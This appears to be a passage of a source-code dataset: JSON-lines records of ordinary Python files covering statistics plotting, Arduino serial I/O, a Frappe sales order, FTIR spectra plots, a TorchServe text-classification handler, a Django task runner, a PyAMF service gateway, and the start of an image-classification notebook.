desvio_padrao,\n\t'coeficiente_de_variacao': coeficiente_de_variacao\n\t}\n\n## helpers for building the histogram (using matplotlib)\ndef generateHistograma(lista_municipios):\n\t## the class intervals were chosen by hand, since this is geographic data:\n\t## they were built from the number of municipalities and a first look at the collected data\n\t## (limite_superior_classes is expected to be a module-level list of class upper bounds)\n\n\ty_axis = getValorClassesHistograma(lista_municipios, limite_superior_classes)\n\tx_axis = range(len(y_axis))\n\twidth_n = 0.5\n\tbar_color = 'blue'\n\n\tbar = plt.bar(x_axis, y_axis, width=width_n, color=bar_color, align=\"center\", linewidth=10)\n\tplt.xticks(x_axis, generateLabelsName(limite_superior_classes, lista_municipios))\n\n\tplt.show()\n\n#\tplt.savefig(\"histograma_%s_classes.png\"%str(len(limite_superior_classes)), dpi=500)\n\ndef generateLabelsName(limite_superior_classes, lista_municipios):\n\tnomes = []\n\tfor i in range(0,len(limite_superior_classes)):\n\t\tif i == 0:\n\t\t\tnomes.append(\"%d a %d\\nhabitantes\"%(getValorMinimo(lista_municipios), limite_superior_classes[i]))\n\t\telse:\n\t\t\tif limite_superior_classes[i] > 999:\n\t\t\t\tnomes.append(\"%d a \\n%d\\nhab.\"%(limite_superior_classes[i-1],limite_superior_classes[i]))\n\t\t\telse:\n\t\t\t\tnomes.append(\"%d a %d\\nhab.\"%(limite_superior_classes[i-1],limite_superior_classes[i]))\n\treturn tuple(nomes)\n\ndef getValorClassesHistograma(lista_municipios, limite_superior_classes):\n\tvalores = []\n\tfor i in range(0,len(limite_superior_classes)):\n\t\tif i == 0:\n\t\t\tvalores.append(getQuantityIntervalBetween(lista_municipios, 0, limite_superior_classes[i]-1))\n\t\telse:\n\t\t\tvalores.append(getQuantityIntervalBetween(lista_municipios, limite_superior_classes[i-1], limite_superior_classes[i]-1))\n\treturn valores\n\n###################### single file application ###############################\n\ndef getQuantityIntervalBetween(lista_municipios,menor=0, maior=0):\n\t## returns how many municipalities have a population inside the inclusive interval (menor, maior)\n\treturn len([municipio for municipio in lista_municipios if municipio.populacao >= menor and municipio.populacao <= maior])\n\ndef readFileMunicipios(src):\n\treturn [Municipio(line) for line in open(src, 'r').readlines() if line[0]!=\"#\"]\n
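The input format readFileMunicipios expects can be read off the Municipio constructor below; a minimal sketch with one made-up CSV row (all values illustrative):

```python
# One data row in the posicao,cod_ibge,nome,uf,populacao layout the class parses
linha = "1,3550308,Sao Paulo,SP,12252023\n"   # illustrative values only
m = Municipio(linha)
print(m.toString())   # 1 - 3550308 - Sao Paulo - SP - 12252023
```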
\nclass Municipio:\n\tposicao, cod_ibge, nome, uf, populacao = 0,0,\"\",\"\",0\n\tdef __init__(self, string):\n\t\tvalues = string.split(\",\")\n\t\tself.posicao = int(values[0])\n\t\tself.cod_ibge = int(values[1])\n\t\tself.nome = values[2]\n\t\tself.uf = values[3]\n\t\tself.populacao = int(values[4])\n\tdef __str__(self):\n\t\treturn self.nome+\" \"+self.uf\n\n\tdef toString(self):\n\t\treturn \"%s - %s - %s - %s - %s\"%(self.posicao, self.cod_ibge, self.nome, self.uf, self.populacao)\nif __name__ == '__main__':\n\tmain()","sub_path":"avaliacao_estatistica/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"245520401","text":"import serial, time\narduino = serial.Serial('/dev/ttyACM0', 9600)\ntime.sleep(2)\narduino.write(b'1')  # pyserial expects bytes on Python 3\nasc = []\n\nfor x in range(33,126):\n\tasc.append(arduino.readline())\n\nfor x in asc:\n\tprint(x)\n\narduino.close()","sub_path":"serialArduino.py","file_name":"serialArduino.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"26451047","text":"# -*- coding: utf-8 -*-\n# Copyright (c) 2021, Noah Jacob and contributors\n# For license information, please see license.txt\n\nfrom __future__ import unicode_literals\nimport frappe\nfrom frappe.model.document import Document\nfrom frappe.utils import flt\n\n\nclass SalesOrder(Document):\n\tdef validate(self):\n\t\tcalc_totals(self)\n\t\tvalidate_quantity(self)\n\t\t\n\n\ndef calc_totals(self):\n\tself.total_amount, self.total_quantity, self.total_cost_price = 0, 0, 0\n\tif not self.items:\n\t\tfrappe.throw(\"Add some Items before saving\")\n\tfor d in self.items:\n\t\td.amount = d.item_quantity * d.item_rate\n\t\tcost_price = flt(d.item_quantity) * flt(d.standard_rate)\n\t\tself.total_cost_price = self.total_cost_price + cost_price\n\t\tself.total_quantity = flt(self.total_quantity) + flt(d.item_quantity)\n\t\tself.total_amount = flt(self.total_amount) + flt(d.amount)\n\n\ndef validate_quantity(self):\n\tfor d in self.items:\n\t\tif d.item_quantity <= 0:\n\t\t\tfrappe.throw(\"Item quantity is invalid\")\n","sub_path":"accounting/accounting/doctype/sales_order/sales_order.py","file_name":"sales_order.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
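The totals logic in calc_totals can be checked outside Frappe with stand-in row objects; a minimal sketch (SimpleNamespace and all numbers are placeholders for the real child-table rows):

```python
from types import SimpleNamespace

items = [SimpleNamespace(item_quantity=2, item_rate=10.0, standard_rate=7.0),
         SimpleNamespace(item_quantity=1, item_rate=5.0, standard_rate=4.0)]
total_amount = sum(i.item_quantity * i.item_rate for i in items)     # 2*10 + 1*5 = 25.0
total_cost = sum(i.item_quantity * i.standard_rate for i in items)   # 2*7 + 1*4 = 18.0
print(total_amount, total_cost)
```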
{"seq_id":"580525213","text":"import matplotlib.pyplot as plt\nimport csv\nimport numpy\n\nwith open('Raw_plastics2.csv', 'r') as f:  # 'rU' is deprecated; plain 'r' is fine here\n    rows = []\n    for row in csv.reader(f):\n        rows.append(row)\n    \nx = []\nlabels = rows[0][1:]\ndel rows[0]\nfor a in range(len(rows)):\n    for b in range(len(rows[a])):\n        if b == 0:\n            x.append(round(float(rows[a][b]), 0))\n        else:\n            rows[a][b] = round(float(rows[a][b]), 2)\n\ncols = []\nfor a in range(1, len(rows[0])):\n    col = []\n    for b in range(len(rows)):\n        col.append(rows[b][a])\n    cols.append(col)\n\nfor b in range(len(cols)):\n    zero = cols[b][0]\n    for c in range(len(cols[b])):\n        cols[b][c] = (cols[b][c]-zero)*(-1)\n\nnew_x = [[], [], []] \nfor a in range(len(cols[0])):\n    this_x = []\n    count = 0\n    for b in range(len(cols)):\n        this_x.append(cols[b][a])\n        if (b+1)%9==0:\n            new_x[count].append(numpy.mean(this_x))\n            this_x = []\n            count += 1\n    \n\nax1 = plt.subplot(111)\n#y = [20, 30, 40]\n#ylab = [20, 30, 40, 50, 60, 70, 80, 90, 100]\ncols = new_x\nlabels = ['Amorphous PET', 'PET powder', 'Weathered PET powder']\n\nfor c in range(len(cols)):\n    ax1.plot(x, cols[c], label=labels[c])\n    plt.sca(ax1)\n    plt.xticks([500, 1000, 1500, 2000, 2500, 3000, 3500, 4000], rotation=90)\n    plt.xlim([4000, 500])\n    plt.ylabel('Absorbance (%)')\n    plt.xlabel('Wavenumber (cm$^{-1}$)')\n    #plt.yticks(y, ylab)\n\nax1.legend()\nplt.tight_layout()\nplt.savefig('Raw plastics2.png', dpi=300)","sub_path":"5_RW_thesis/Degradation_FTIR/plot_raw2.py","file_name":"plot_raw2.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
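The rebase-and-average loops above can be written as a couple of numpy array operations; a sketch assuming the same layout (27 traces, 9 replicates per material; the random data is just a placeholder):

```python
import numpy as np

spectra = np.random.rand(100, 27)       # placeholder: 100 wavenumbers x 27 traces
rebased = -(spectra - spectra[0, :])    # zero each trace at its first point, then flip sign
means = rebased.reshape(100, 3, 9).mean(axis=2)   # average each block of 9 replicate columns
print(means.shape)                      # (100, 3): one mean trace per material
```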
{"seq_id":"511945480","text":"#!/usr/bin/env python\n# encoding: utf-8\n# @author: 有莘不殁 (Lei Wang)\n# @license: MIT\n# @contact: lwangshark2013@gmail.com\n# @software: pycharm\n# @file: TextCNN_handle.py\n# @time: 2021/3/25 6:08 PM\n# @desc: ModelHandler defines a custom model handler for TextCNN\n\nimport logging\nimport torch\nimport torch.nn.functional as F\nfrom torchtext.data.utils import ngrams_iterator\nimport pickle as pkl\nimport os\nfrom ts.torch_handler.base_handler import BaseHandler\n\nid2class = {0:\"finance\",1:\"realty\",2:\"stocks\",3:\"edu\",4:\"sci\",5:\"society\",6:\"politics\",7:\"sports\",8:\"game\",9:\"entertainment\"}\n\nUNK, PAD = '<UNK>', '<PAD>'  # unknown-character and padding tokens\nvocab_dir = \"vocab.pkl\"\nvocab = pkl.load(open(vocab_dir, 'rb'))\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\nbatch_size = 128  # mini-batch size\npad_size = 32  # should match the training setting; choose it from the text-length distribution\n\n\nlogger = logging.getLogger(__name__)\n\nclass TextCNN_handle(BaseHandler):\n    \"\"\"\n    A custom model handler implementation.\n    \"\"\"\n\n    class InferDataIterater(object):\n        def __init__(self, batches, batch_size, device):\n            self.batch_size = batch_size\n            self.batches = batches\n            self.n_batches = len(batches) // batch_size\n            self.residue = False  # whether a leftover partial batch exists\n            if self.n_batches == 0:\n                self.residue = True\n            elif len(batches) % self.n_batches != 0:\n                self.residue = True\n            self.index = 0\n            self.device = device\n\n        def _to_tensor(self, datas):\n            x = torch.LongTensor([_[0] for _ in datas]).to(self.device)\n            y = torch.LongTensor([_[1] for _ in datas]).to(self.device)\n            # pre-padding lengths (capped at pad_size)\n            # seq_len = torch.LongTensor([_[2] for _ in datas]).to(self.device)\n            return x, y\n\n        def __next__(self):\n            if self.residue and self.index == self.n_batches:\n                batches = self.batches[self.index * self.batch_size: len(self.batches)]\n                self.index += 1\n                batches = self._to_tensor(batches)\n                return batches\n\n            elif self.index >= self.n_batches:\n                self.index = 0\n                raise StopIteration\n            else:\n                batches = self.batches[self.index * self.batch_size: (self.index + 1) * self.batch_size]\n                self.index += 1\n                batches = self._to_tensor(batches)\n                return batches\n\n        def __iter__(self):\n            return self\n\n        def __len__(self):\n            if self.residue:\n                return self.n_batches + 1\n            else:\n                return self.n_batches\n\n    def build_infer_iterator(self, dataset, batch_size, device):\n        iter = self.InferDataIterater(dataset, batch_size, device)\n        return iter\n\n    def __init__(self):\n        self._context = None\n        self.initialized = False\n        self.explain = False\n        self.target = 0\n        self.device = device\n\n    def initialize(self, context):\n        \"\"\"\n        Initialize model. This will be called during model loading time\n        :param context: Initial context contains model server system properties.\n        :return:\n        \"\"\"\n        self._context = context\n        super().initialize(context)\n        self.initialized = True\n        # load the model, refer 'custom handler class' above for details\n        # self.manifest = context.manifest\n        #\n        # properties = context.system_properties\n        # model_dir = properties.get(\"model_dir\")\n        # self.device = torch.device(\"cuda:\" + str(properties.get(\"gpu_id\")) if torch.cuda.is_available() else \"cpu\")\n        #\n        # # Read model serialize/pt file\n        # serialized_file = self.manifest['model']['serializedFile']\n        # model_pt_path = os.path.join(model_dir, serialized_file)\n        # if not os.path.isfile(model_pt_path):\n        #     raise RuntimeError(\"Missing the model.pt file\")\n        #\n        # model = torch.load(model_pt_path)\n        # model.eval()  # freeze inference-time behaviour of layers such as dropout\n        # self.model = model.to(device)\n\n    def preprocess(self, data):\n        \"\"\"\n        Transform raw input into model input data.\n        :param batch: list of raw requests, should match batch size\n        :return: list of preprocessed model input data\n        \"\"\"\n        # Take the input data and make it inference ready\n        # print(data)\n        # logger.info(\"data is \")\n        # logger.info(data.keys())\n        inputs = data[0]['body']['input']\n        for key in data:\n            logger.info(key)\n        # data = inputs.get(\"data\") or inputs.get(\"body\")\n        preprocessed_data = inputs\n\n\n\n        tokenizer = lambda x: [y for y in x]\n        contents = []\n        for lin in preprocessed_data:\n            lin = lin.strip()\n            if not lin:\n                raise Exception('The input sentence is None !!!')\n            words_line = []\n            token = tokenizer(lin)\n            seq_len = len(token)\n            if pad_size:\n                if len(token) < pad_size:\n                    token.extend([PAD] * (pad_size - len(token)))\n                else:\n                    token = token[:pad_size]\n                    seq_len = pad_size\n            # word to id\n            for word in token:\n                words_line.append(vocab.get(word, vocab.get(UNK)))  # dict.get(key, default): the second argument is the fallback when the key is missing\n            contents.append((words_line, int(0), seq_len))\n        infer_iter = self.build_infer_iterator(contents, batch_size, device)\n        return infer_iter  # [([...], 0), ([...], 1), ...]\n\n    def inference(self, model_input):\n        \"\"\"\n        Internal inference methods\n        :param model_input: transformed model input data\n        :return: list of inference output in NDArray\n        \"\"\"\n        # Do some inference call to engine here and return output\n        model_output = []\n        for texts, _ in model_input:\n            out_puts = self.model.forward(texts)\n            logger.info(\"the output is :\")\n            logger.info(out_puts)\n            predics = torch.max(out_puts.data, 1)[1].cpu().numpy().tolist()\n            for i in predics:\n                model_output.append(id2class[i])\n        res = \";\".join(model_output)\n\n        return [res]\n\n    def postprocess(self, inference_output):\n        \"\"\"\n        Return inference result.\n        :param inference_output: list of inference output\n        :return: list of predict results\n        \"\"\"\n        # Take output from network and post-process to desired format\n        postprocess_output = inference_output\n\n        return postprocess_output\n\n    def handle(self, data, context):\n        \"\"\"\n        Invoked by TorchServe for each prediction request.\n        Does pre-processing of data, prediction using the model, and postprocessing of the prediction output\n        :param data: Input data for prediction\n        :param context: Initial context contains model server system properties.\n        :return: prediction output\n        \"\"\"\n        model_input = self.preprocess(data)\n        model_output = self.inference(model_input)\n        return self.postprocess(model_output)","sub_path":"examples/TextCNN_handle.py","file_name":"TextCNN_handle.py","file_ext":"py","file_size_in_byte":7270,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
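The padding-and-lookup path in preprocess can be exercised on its own with a toy vocabulary (the real handler loads vocab.pkl; every value below is made up):

```python
vocab = {'<UNK>': 0, '<PAD>': 1, '你': 2, '好': 3}   # toy stand-in for vocab.pkl
pad_size = 5
token = [ch for ch in '你好吗']                       # char-level tokenizer, as above
token += ['<PAD>'] * (pad_size - len(token))          # right-pad to pad_size
ids = [vocab.get(t, vocab['<UNK>']) for t in token]
print(ids)   # [2, 3, 0, 1, 1] -- '吗' is out-of-vocabulary, so it maps to <UNK>
```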
{"seq_id":"525659899","text":"from multiprocessing import Process\n\nimport Twilio.settings as settings\nfrom django.db import connection \nimport Appis.common as common\nimport time\n\nfrom Appis.Tool import index as worker\n# Create your views here.\n\nWAIT_MINUTES = settings.WAIT_MINUTES\n\ndef tick(id, way):\n\n    connection.close()\n    \n    if way == common.WAY[0][0]:\n        worker.serial_task(id)\n    elif way == common.WAY[1][0]:\n        worker.serial_email(id)\n    \nclass TaskProcess(Process):\n    task_id = 0\n    way = common.WAY[0][0]\n    one = True\n    def __init__(self, task_id, way, one = True):\n        super().__init__()\n        self.task_id = task_id\n        self.way = way\n        self.one = one\n\n    def run(self):\n        if self.one:\n            time.sleep(60*WAIT_MINUTES)\n\n            tick(self.task_id, self.way)\n        else:\n            time.sleep(10)\n            for ids in self.task_id:\n                tick(ids, self.way)\n                time.sleep(0.5)\n","sub_path":"Twilio/Appis/Record/APSTask.py","file_name":"APSTask.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"} +{"seq_id":"112406163","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport cv\nimport sys\n\nfrom pykoki import PyKoki, Point2Di, Point2Df, CameraParams\n\nif len(sys.argv) != 2:\n    print(\"opencv_example.py IMG_FILE\", file=sys.stderr)\n    exit(1)\n\nfilename = sys.argv[1]\n\nimg = cv.LoadImage( filename, cv.CV_LOAD_IMAGE_GRAYSCALE )\nassert img, \"Failed to load image at {0}\".format(filename)\n\nkoki = PyKoki()\n\nparams = CameraParams(Point2Df( img.width/2, img.height/2 ),\n                      Point2Df(571, 571),\n                      Point2Di( img.width, img.height ))\n\nprint(koki.find_markers( img, 0.1, params ))\n","sub_path":"opencv_example.py","file_name":"opencv_example.py","file_ext":"py","file_size_in_byte":604,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"45"}
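The pykoki example above uses the legacy cv module; for reference, a rough modern-OpenCV equivalent of its image-loading step (cv2 API; the file name is a placeholder):

```python
import cv2

img = cv2.imread('marker.png', cv2.IMREAD_GRAYSCALE)  # replacement for cv.LoadImage(..., CV_LOAD_IMAGE_GRAYSCALE)
assert img is not None, 'Failed to load image'
height, width = img.shape                              # cv2 returns a numpy array rather than an IplImage
print(width, height)
```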
{"seq_id":"292943244","text":"#coding: utf-8\r\n'''\r\nCreated on 2014-3-24\r\n\r\n@author: Administrator\r\n'''\r\nimport json\r\nimport re\r\nimport os\r\nimport logging, traceback\r\nfrom functools import wraps\r\nfrom django.utils.decorators import available_attrs\r\nfrom account.models import AuthUser\r\nfrom library.models import Library\r\n\r\ndef json_data(code, data):\r\n    return json.dumps({'code':code, 'data':data})\r\n\r\ndef SuccessResponse(data=''):\r\n    return json_data(1, data)\r\n\r\ndef FailResponse(data):\r\n    return json_data(-1, data)\r\n\r\ndef get_library(library_id):\r\n    try: library_id = int(library_id)\r\n    except: return None\r\n    \r\n    try: library = Library.objects.get(id=library_id)\r\n    except(Library.DoesNotExist): library = None\r\n    return library\r\n\r\ndef echo(request, data):\r\n    return \"echo:%s\" % data\r\n\r\nimport views_auth\r\nimport views_diy\r\nimport views_opus\r\nimport views_personal\r\nimport views_public\r\nimport views_story\r\nimport views_3qdou_new\r\nimport views_zone\r\nimport views_topic\r\nimport views_activity\r\n\r\nservices = {\r\n    'myservice.echo': echo,\r\n    # could include other functions as well\r\n    \r\n    'AccountService.reg_checkusername': views_auth.reg_checkusername,\r\n    'AccountService.reg_checknickname': views_auth.reg_checknickname,\r\n    'AccountService.register': views_auth.register,\r\n    'AccountService.guest_login': views_auth.guest_login,\r\n    'AccountService.guest_register': views_auth.guest_register,\r\n    'AccountService.login': views_auth.login,\r\n    'AccountService.logout': views_auth.logout,\r\n    'AccountService.get_account': views_auth.get_account,\r\n    'AccountService.update_account': views_auth.update_account,\r\n    'AccountService.change_pass': views_auth.change_pass,\r\n    'AccountService.question': views_auth.question,\r\n    'AccountService.reset_password': views_auth.reset_password,\r\n    \r\n    'DiyService.get_lib_info': views_diy.get_lib_info, # fetch the library's basic info first\r\n    'DiyService.get_font_list': views_diy.get_font_list,\r\n    # get the text-box list for the new font designer. coder: kamihait 2015/42\r\n    'DiyService.get_new_font_list': views_diy.get_new_font_list,\r\n    'DiyService.get_font_img': views_diy.get_font_img,\r\n    'DiyService.update_avatar': views_diy.update_avatar,\r\n    'DiyService.get_res_url': views_diy.get_res_url,\r\n    'DiyService.get_personal_url': views_diy.get_personal_url,\r\n    'DiyService.get_public_url': views_public.get_public_url,\r\n    \r\n    \r\n    'DiyService.get_zone_type_list': views_diy.get_zone_type_list,\r\n    'DiyService.get_zone_style_list': views_diy.get_zone_style_list,\r\n    'DiyService.get_opus_type_list': views_diy.get_opus_type_list,\r\n    'DiyService.get_opus_class_list': views_diy.get_opus_class_list,\r\n    'DiyService.get_opus_size_list': views_diy.get_opus_size_list,\r\n    # get all subcategories of personal works\r\n    'DiyService.get_opus_class_child_list': views_diy.get_opus_class_child_list,\r\n    \r\n    'DiyService.get_notice_list': views_diy.get_notice_list,\r\n    'DiyService.get_msg_list': views_diy.get_msg_list,\r\n    'DiyService.get_index_list': views_diy.get_index_list, # home-page works list, including original and personally shared works\r\n    \r\n    'DiyService.get_zone_list': views_public.get_zone_list, #all\r\n    'DiyService.get_bg_list': views_public.get_bg_list, #1\r\n    'DiyService.get_bg_list2': views_public.get_bg_list2, # background list; must distinguish single vs. double pages\r\n    'DiyService.get_decorator_list': views_public.get_decorator_list, #2\r\n    'DiyService.get_frame_list': views_public.get_frame_list, #3\r\n    'DiyService.get_template_list': views_public.get_template_list, #4\r\n    'DiyService.get_template_list2': views_public.get_template_list2, #4\r\n    'DiyService.get_audio_list': views_public.get_audio_list, #5\r\n    'DiyService.get_video_list': views_public.get_video_list, #6\r\n    'DiyService.get_template_info': views_public.get_template_info, # get template details\r\n    \r\n    'DiyService.get_blank_opus': views_public.get_blank_opus, # all info for a blank work\r\n    \r\n    'DiyService.like_personal_res': views_zone.like_personal_res,\r\n    'DiyService.like_public_res': views_zone.like_public_res,\r\n    'DiyService.fetch_bg_list': views_zone.fetch_bg_list,\r\n    'DiyService.fetch_decorator_list': views_zone.fetch_decorator_list,\r\n    'DiyService.fetch_frame_list': views_zone.fetch_frame_list,\r\n    'DiyService.fetch_template_list': views_zone.fetch_template_list,\r\n    'DiyService.fetch_template_info': views_zone.fetch_template_info,\r\n    #'DiyService.fetch_mark_list': views_zone.fetch_mark_list,\r\n    #'DiyService.fetch_emotion_list': views_zone.fetch_emotion_list,\r\n    \r\n    \r\n    'DiyService.fetch_audio_list': views_zone.fetch_audio_list,\r\n    'DiyService.fetch_video_list': views_zone.fetch_video_list,\r\n    'DiyService.fetch_picture_list': views_zone.fetch_picture_list, # creation platform: fetch related resources\r\n    'DiyService.fetch_scrawl_list': views_zone.fetch_scrawl_list, # scrawl (doodle) list\r\n\r\n    'DiyService.get_press_list': views_opus.get_press_list,\r\n    'DiyService.get_opus_list': views_opus.get_opus_list, # personal space: get the user's works list\r\n    'DiyService.get_opus_info': views_opus.get_opus_info,\r\n    'DiyService.view_opus': views_opus.view_opus,\r\n    
#'DiyService.get_opus_page_image': views_opus.get_opus_page_image,\r\n    #'DiyService.get_opus_page_json': views_opus.get_opus_page_json,\r\n    \r\n    'DiyService.create_opus': views_opus.create_opus, # create a new work\r\n    'DiyService.new_opus_page': views_opus.new_opus_page,\r\n    'DiyService.update_opus_page': views_opus.update_opus_page,\r\n    'DiyService.update_opus_info': views_opus.update_opus_info,\r\n    'DiyService.apply_for_press': views_opus.apply_for_press, # apply to publish a work\r\n    'DiyService.apply_for_template': views_opus.apply_for_template, # convert a work into a template\r\n    'DiyService.delete_opus': views_opus.delete_opus, # delete a personal work\r\n    'DiyService.delete_opus_page': views_opus.delete_opus_page,\r\n    'DiyService.change_opus_page': views_opus.change_opus_page,\r\n    'DiyService.copy_opus': views_opus.copy_opus, # copy a work\r\n    \r\n    #'DiyService.grade_opus': views_opus.grade_opus, # rate a work\r\n    #'DiyService.comment_opus': views_opus.comment_opus, # comment on a work\r\n    #'DiyService.get_comment_list': views_opus.get_comment_list,\r\n    #'DiyService.praise_opus': views_opus.praise_opus, # like a work\r\n    \r\n    'DiyService.grade_opus': views_opus.grade_opus_mongo, # rate a work\r\n    'DiyService.comment_opus': views_opus.comment_opus_mongo, # comment on a work\r\n    'DiyService.get_comment_list': views_opus.get_comment_list_mongo,\r\n    'DiyService.praise_opus': views_opus.praise_opus_mongo, # like a work\r\n    \r\n    \r\n    'DiyService.create_album': views_personal.create_album, # create an album\r\n    'DiyService.get_album_list': views_personal.get_album_list, # get the album list\r\n    #'DiyService.upload_personal_res': views_personal.upload_personal_res, # this endpoint is no longer needed\r\n    'DiyService.get_personal_res': views_personal.get_personal_res,\r\n    'DiyService.delete_personal_res': views_personal.delete_personal_res,\r\n    'DiyService.delete_album': views_personal.delete_album,\r\n    'DiyService.update_scrawl': views_personal.update_scrawl, # scrawl (doodle)\r\n    'DiyService.get_scrawl_list': views_personal.get_scrawl_list,\r\n    'DiyService.delete_scrawl': views_personal.delete_scrawl,\r\n    'DiyService.update_camera_image': views_personal.update_camera_image, # webcam selfie (what about phone selfies?)\r\n    \r\n    # \"Story King\" contest endpoints\r\n    'StoryService.get_province_list': views_story.get_province_list,\r\n    'StoryService.get_city_list': views_story.get_city_list,\r\n    'StoryService.get_county_list': views_story.get_county_list,\r\n    'StoryService.get_story_list': views_story.get_story_list,\r\n    'StoryService.vote_story': views_story.vote_story,\r\n    \r\n    # learning-resource library: get_3qdou_catalog\r\n    'DouService.get_3qdou_catalog': views_3qdou_new.get_3qdou_catalog,\r\n    'DouService.get_all_list': views_3qdou_new.get_all_list, # get the full resource list\r\n    'DouService.search_res_list': views_3qdou_new.search_res_list,\r\n    \r\n    'TopicService.get_emotion_type_list': views_topic.get_emotion_type_list, # get emotion categories\r\n    'TopicService.fetch_topic_template': views_topic.fetch_topic_template,\r\n    'TopicService.fetch_topic_mark': views_topic.fetch_topic_mark,\r\n    'TopicService.fetch_topic_emotion': views_topic.fetch_topic_emotion,\r\n    \r\n    'TopicService.get_topic_classify': views_topic.get_topic_classify, # get the topic category list\r\n    # create a topic\r\n    'TopicService.update_topic': views_topic.update_topic,\r\n    'TopicService.fetch_topic_info': views_topic.fetch_topic_info,\r\n    'TopicService.join_topic': views_topic.join_topic,\r\n    # get the topic list\r\n    'TopicService.fetch_topic_list': views_topic.fetch_topic_list,\r\n    'TopicService.fetch_topic_page': views_topic.fetch_topic_page,\r\n    # like a topic\r\n    'TopicService.topic_praise': views_topic.topic_praise,\r\n    # add a topic comment\r\n    'TopicService.create_topic_remark': views_topic.create_remark,\r\n    # get the topic comment list\r\n    'TopicService.get_remark_list': views_topic.get_remark_list,\r\n
    # fetch a specific topic\r\n    'TopicService.fetch_topic_one': views_topic.fetch_topic_one,\r\n\r\n    'ActivityService.get_province_list': views_activity.get_province_list,\r\n    'ActivityService.get_city_list': views_activity.get_city_list,\r\n    'ActivityService.get_county_list': views_activity.get_county_list,\r\n    \r\n    'ActivityService.fetch_activity_list': views_activity.fetch_activity_list,\r\n    'ActivityService.fetch_activity_info': views_activity.fetch_activity_info,\r\n    # get the combined list of activities and activity series\r\n    'ActivityService.search_activity_and_series': views_activity.get_activity_and_series,\r\n    \r\n    'ActivityService.fetch_activity_fruit_list': views_activity.fetch_activity_fruit_list,\r\n    'ActivityService.grade_fruit': views_activity.grade_fruit,\r\n    #'ActivityService.comment_fruit': views_activity.comment_fruit,\r\n    #'ActivityService.get_comment_list': views_activity.get_comment_list,\r\n    'ActivityService.comment_fruit': views_activity.comment_fruit_mongo,\r\n    'ActivityService.get_comment_list': views_activity.get_comment_list_mongo,\r\n    'ActivityService.praise_fruit': views_activity.praise_fruit_mongodb,\r\n    'ActivityService.preview_fruit': views_activity.preview_fruit,\r\n    'ActivityService.get_client_ip': views_activity.get_client_ip,\r\n    #'ActivityService.vote_fruit': views_activity.vote_fruit,\r\n    'ActivityService.vote_fruit': views_activity.vote_fruit_mongo,\r\n\r\n    # search a mixed list of activities and works\r\n    'ActivityService.search_activity_and_fruit': views_activity.search_activity_and_fruit,\r\n    # search the activity-series list\r\n    # editor: kamihati 2015/5/13 fetch the sub-activities when the client opens an activity series\r\n    'ActivityService.get_series_activity': views_activity.get_series_activity,\r\n    'ActivityService.update_activity': views_activity.update_activity,\r\n    'ActivityService.update_activity_option': views_activity.update_activity_option,\r\n    'ActivityService.update_activity_group': views_activity.update_activity_group,\r\n    'ActivityService.update_activity_group_list': views_activity.update_activity_group_list,\r\n    # coder: kamihati 2015/4/8 updated the entry-submission logic for the new version\r\n    'ActivityService.update_activity_fruit': views_activity.update_activity_fruit,\r\n    'ActivityService.apply_activity': views_activity.apply_activity,\r\n    'ActivityService.delete_activity': views_activity.delete_activity,\r\n    'ActivityService.apply_fruit': views_activity.apply_fruit,\r\n    'ActivityService.delete_fruit': views_activity.delete_fruit,\r\n    'ActivityService.approve_fruit': views_activity.approve_fruit,\r\n\r\n    # activity sign-up. editor: kamihati 2015/6/5\r\n    'ActivityService.sign_activity_member': views_activity.sign_activity_member,\r\n    # whether the user has signed up. editor: kamihati 2015/6/5\r\n    'ActivityService.has_activity_signup': views_activity.has_activity_signup,\r\n}\r\n\r\n\r\nfrom pyamf.remoting.gateway.django import DjangoGateway\r\nfrom WebZone.settings import DEBUG\r\nWebZoneGateway = DjangoGateway(services, debug=DEBUG)\r\n\r\n\r\n#WebZoneGateway = DjangoGateway(services, debug=is_debug, timezone_offset=28800, expose_request=False)\r\n\r\n\r\n","sub_path":"gateway/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":12303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"43"} +{"seq_id":"109185957","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nget_ipython().system('wget --no-check-certificate https://storage.googleapis.com/mledu-datasets/cats_and_dogs_filtered.zip -O /tmp/cats_and_dogs_filtered.zip')\n\n\n# In[1]:\n\n\nimport os\nimport zipfile\n\n\n# In[7]:\n\n\nos.listdir('data/train/cats')\n\n\n# In[8]:\n\n\nbase_dir = 
'data/'\ntrain_dir = os.path.join(base_dir, 'train/')\nvalidation_dir = os.path.join(base_dir, 'validation/')\ntrain_cats_dir = os.path.join(train_dir, 'cats')\ntrain_dogs_dir = os.path.join(train_dir, 'dogs')\nvalidation_cats_dir = os.path.join(validation_dir, 'cats')\nvalidation_dogs_dir = os.path.join(validation_dir, 'dogs')\n\n\n# In[9]:\n\n\ntrain_cat_fnames = os.listdir(train_cats_dir)\ntrain_dog_fnames = os.listdir(train_dogs_dir)\nprint(train_cat_fnames[:10])\nprint(train_dog_fnames[:10])\n\n\n# In[10]:\n\n\nprint('The total training cat images:', len(os.listdir(train_cats_dir)))\nprint('The total training dog images:', len(os.listdir(train_dogs_dir)))\nprint('The total validation cat images:', len(os.listdir(validation_cats_dir)))\nprint('The total validation dog images:', len(os.listdir(validation_dogs_dir)))\n\n\n# In[11]:\n\n\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nget_ipython().run_line_magic('matplotlib', 'inline')\n\n\n# In[12]:\n\n\nnrows = 4\nncols = 4\npic_index = 0\n\n\n# In[13]:\n\n\nfig = plt.gcf()\nfig.set_size_inches(ncols*4, nrows*4)\npic_index += 8\nnext_cat_pic = [os.path.join(train_cats_dir, fname) for fname in 